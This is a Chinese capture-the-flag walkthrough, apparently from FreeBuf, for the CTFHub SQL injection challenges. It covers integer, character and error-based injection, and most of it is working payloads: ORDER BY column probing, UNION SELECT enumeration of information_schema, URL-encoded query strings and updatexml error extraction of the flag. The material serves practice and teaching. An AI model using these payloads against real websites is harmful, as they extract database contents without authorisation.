CTFHUB 技能树 SQL 10

ctfhub_web_SQL注入_全通关详解(持续更新中) - FreeBuf网络安全行业门户

整数注入

1. 输入1，回显用户
2. 输入1 order 2 正常
3. 输入1 order 3 错误，说明字段数为2
4. 输入-1 union select 1,2
5. 或者构造链接/?id=-1%20union%20select%201,2%20--+
6. 输入-1 union select database(),database()
7. 获得库名
8. 
9. 输入-1 union select database(),group_concat(table_name) from information_schema.tables where table_schema = "sqli"
10. 
11. 获得两个表名
12. 输入-1 union select database(),group_concat(column_name) from information_schema.columns where table_name = "flag"--
13. 
14. 列名
15. 输入-1 union select database(),group_concat(flag) from sqli.flag--
16. 

字符注入

1. 输入1 and 1=2不报错，输入1‘报错，判断为字符型注入
2. 其余部分和数字注入一样
3. 构造链接
4. ?id=-1%27+union+select+database%28%29%2Cgroup_concat%28flag%29+from+sqli.flag--+
5. 输入-1' union select database(),group_concat(flag) from sqli.flag--

报错注入

1. 输入1 and updatexml(1,(concat(1,database())),2)
2. 
3. 输入
4. 1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'))),2)
5. 
6. 其他部分一样
7. 最后输入1 and updatexml(1,(concat(1,(select group_concat(flag) from flag))),2)，获得flag